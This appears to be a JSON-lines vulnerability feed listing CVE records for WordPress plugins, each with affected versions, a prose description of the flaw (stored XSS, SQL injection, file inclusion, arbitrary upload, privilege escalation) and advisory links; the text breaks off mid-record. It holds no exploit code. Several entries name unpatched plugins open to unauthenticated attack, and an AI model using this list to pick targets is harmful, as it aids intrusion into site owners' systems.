{"CVE_ID":"CVE-2023-0063","slug":"synved-shortcodes","versionImpact":"1.6.36","description":"The WordPress Shortcodes WordPress plugin through 1.6.36 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2262f2fc-8122-46ed-8e67-8c34ee35fc97\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2262f2fc-8122-46ed-8e67-8c34ee35fc97\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0924","slug":"popup-zyrex","versionImpact":"1.0","description":"The ZYREX POPUP WordPress plugin through 1.0 does not validate the type of files uploaded when creating a popup, allowing a high privileged user (such as an Administrator) to upload arbitrary files, even when modifying the file system is disallowed, such as in a multisite install.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0fd0d7a5-9263-43b6-9244-7880c3d3e6f4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0fd0d7a5-9263-43b6-9244-7880c3d3e6f4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6082","slug":"enigma-chartjs","versionImpact":"2023.2","description":"The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3d43aac-66c8-4218-b3f0-5256f895eda3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3d43aac-66c8-4218-b3f0-5256f895eda3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lynk.nl\\\/\",\"name\":\"https:\\\/\\\/lynk.nl\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4160","slug":"download-manager","versionImpact":"3.2.90","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm-all-packages' shortcode in all versions up to, and including, 3.2.90 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f51258a-e228-412f-9d97-28ab679136d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f51258a-e228-412f-9d97-28ab679136d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=2996137#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=2996137#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_all_packages-list-all-downloads-in-tabular-format-in-a-page\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_all_packages-list-all-downloads-in-tabular-format-in-a-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080781\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080781\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4258","slug":"yotuwp-easy-youtube-embed","versionImpact":"1.3.13","description":"The Video Gallery \u2013 YouTube Playlist, Channel Gallery by YotuWP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.13 via the settings parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6feae1c4-3735-4a33-85a5-867d458d2e8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6feae1c4-3735-4a33-85a5-867d458d2e8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/yotuwp.php#L731\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/yotuwp.php#L731\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6314","slug":"iq-testimonials","versionImpact":"2.2.7","description":"The IQ Testimonials plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'process_image_upload' function in versions up to, and including, 2.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This can only be exploited if the 'gd' php extension is not loaded on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bec50640-a550-49a8-baf6-2dd53995f90b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bec50640-a550-49a8-baf6-2dd53995f90b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iq-testimonials\\\/tags\\\/2.2.7\\\/lib\\\/iq-testimonials-form.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iq-testimonials\\\/tags\\\/2.2.7\\\/lib\\\/iq-testimonials-form.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5765","slug":"wpstickybar-sticky-bar-sticky-header","versionImpact":"2.1.0","description":"The WpStickyBar  WordPress plugin through 2.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b73f84c-611e-4681-b362-35e721478ba4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b73f84c-611e-4681-b362-35e721478ba4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12270","slug":"beautiful-taxonomy-filters","versionImpact":"2.4.4","description":"The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beautiful-taxonomy-filters\\\/trunk\\\/includes\\\/class-beautiful-taxonomy-filters.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beautiful-taxonomy-filters\\\/trunk\\\/includes\\\/class-beautiful-taxonomy-filters.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12571","slug":"store-locator","versionImpact":"3.98.9","description":"The Store Locator for WordPress with Google Maps \u2013 LotsOfLocales plugin for WordPress is vulnerable to Local File Inclusion in version 3.98.9 via the 'sl_engine' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator\\\/trunk\\\/sl-functions.php#L1919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator\\\/trunk\\\/sl-functions.php#L1919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea89a6e-e089-4e8d-afd8-2a217f6910a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea89a6e-e089-4e8d-afd8-2a217f6910a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12213","slug":"wp-job-board-pro","versionImpact":"1.2.76","description":"The WP Job Board Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.76. This is due to the plugin allowing a user to supply the 'role' field when registering. This makes it possible for unauthenticated attackers to register as an administrator on vulnerable sites.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cdfce88-b6c2-4820-9d6f-446f61b9b596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cdfce88-b6c2-4820-9d6f-446f61b9b596?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1670","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'cid' parameter in all versions up to, and including, 2.2.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/pages\\\/wpsp-exams.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/pages\\\/wpsp-exams.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38c28f4-e73a-4eb2-8bbd-73c849385c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38c28f4-e73a-4eb2-8bbd-73c849385c4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32200","slug":"advanced-backgrounds","versionImpact":"1.12.7","description":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Nikita Advanced WordPress Backgrounds allows Code Injection. This issue affects Advanced WordPress Backgrounds: from n\/a through 1.12.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-backgrounds\\\/vulnerability\\\/wordpress-advanced-wordpress-backgrounds-plugin-1-12-4-content-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-backgrounds\\\/vulnerability\\\/wordpress-advanced-wordpress-backgrounds-plugin-1-12-4-content-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6070","slug":"restrict-file-access","versionImpact":"1.1.2","description":"The Restrict File Access plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.2 via the output() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/url_rewrite\\\/url_rewrite.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/url_rewrite\\\/url_rewrite.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9eec61-bf51-4cf7-b567-58ee2ccd91c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9eec61-bf51-4cf7-b567-58ee2ccd91c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6718","slug":"b1-accounting","versionImpact":"2.2.56","description":"The B1.lt plugin for WordPress is vulnerable to SQL Injection due to a missing capability check on the b1_run_query AJAX action in all versions up to, and including, 2.2.56. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute and run arbitrary SQL commands.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e479a3f-ef1a-4476-89e1-86d0f388f2c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e479a3f-ef1a-4476-89e1-86d0f388f2c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0557","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.2.5. This could allow unauthenticated attackers to obtain a nonce needed for the creation of posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L709\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L709\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62eb136f-3cb0-40dc-a154-015a7fa1077b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62eb136f-3cb0-40dc-a154-015a7fa1077b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36701","slug":"kingcomposer","versionImpact":"2.9.3","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to Arbitrary File Uploads in versions up to, and including, 2.9.3 via the 'process_bulk_action' function in the 'kingcomposer\/includes\/kc.extensions.php' file. This makes it possible for authenticated users with author level permissions and above to upload arbitrary files onto the server which can be used to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a62dd0-386c-41b3-b8dd-ced443da9f92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a62dd0-386c-41b3-b8dd-ced443da9f92?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6081","slug":"enigma-chartjs","versionImpact":"2023.2","description":"The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f011911-5fd1-46d9-b468-3062b4ec6f1e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f011911-5fd1-46d9-b468-3062b4ec6f1e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lynk.nl\\\/\",\"name\":\"https:\\\/\\\/lynk.nl\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5427","slug":"wp-cafe","versionImpact":"2.2.24","description":"The WPCafe \u2013 Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Reservation Form shortcode in all versions up to, and including, 2.2.24 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/336e2429-97ab-4948-9d21-f0121216d2d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/336e2429-97ab-4948-9d21-f0121216d2d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cafe\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cafe\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095135\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095135\\\/#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4095","slug":"jquery-collapse-o-matic","versionImpact":"1.8.5.7","description":"The Collapse-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'expand' and 'expandsub' shortcode in all versions up to, and including, 1.8.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c56931-c2af-4940-95e4-3f3dae51c31c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c56931-c2af-4940-95e4-3f3dae51c31c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/baden03\\\/collapse-o-matic\\\/blob\\\/561d8ab53a03e44c12234ba9687226fdbb5054cc\\\/collapse-o-matic.php#L343\",\"name\":\"https:\\\/\\\/github.com\\\/baden03\\\/collapse-o-matic\\\/blob\\\/561d8ab53a03e44c12234ba9687226fdbb5054cc\\\/collapse-o-matic.php#L343\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-collapse-o-matic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jquery-collapse-o-matic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pluginoven.com\\\/plugins\\\/collapse-o-matic\\\/documentation\\\/shortcode\\\/\",\"name\":\"https:\\\/\\\/pluginoven.com\\\/plugins\\\/collapse-o-matic\\\/documentation\\\/shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3094116%40jquery-collapse-o-matic&new=3094116%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3094116%40jquery-collapse-o-matic&new=3094116%40jquery-collapse-o-matic&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6313","slug":"forms-gutenberg","versionImpact":"2.2.9","description":"The Gutenberg Forms plugin for WordPress is vulnerable to arbitrary file uploads due to the users can specify the allowed file types in the 'upload' function in versions up to, and including, 2.2.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0315b53-46a1-46b4-a53e-0d914866ca50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0315b53-46a1-46b4-a53e-0d914866ca50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/triggers\\\/email.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/triggers\\\/email.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/Utils\\\/Bucket.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-gutenberg\\\/tags\\\/2.2.9\\\/Utils\\\/Bucket.php#L19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4096","slug":"responsive-tabs","versionImpact":"4.0.8","description":"The Responsive Tabs WordPress plugin through 4.0.8 does not sanitise and escape some of its Tab settings, which could allow high privilege users such as Contributors and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dba5e9e-24be-458a-9150-7c7a958e66cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4dba5e9e-24be-458a-9150-7c7a958e66cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7122","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.13.6","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/668621b0-67ef-44fc-a126-e8c4e372666e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/668621b0-67ef-44fc-a126-e8c4e372666e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/assets\\\/js\\\/eae.js#L568\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/assets\\\/js\\\/eae.js#L568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/text-separator\\\/widgets\\\/text-separator.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/text-separator\\\/widgets\\\/text-separator.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-gradient\\\/module.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/animated-gradient\\\/module.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/image-compare\\\/widgets\\\/image-compare.php#L537\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/image-compare\\\/widgets\\\/image-compare.php#L537\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L1045\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L1045\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addon-elements-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addon-elements-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143440\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"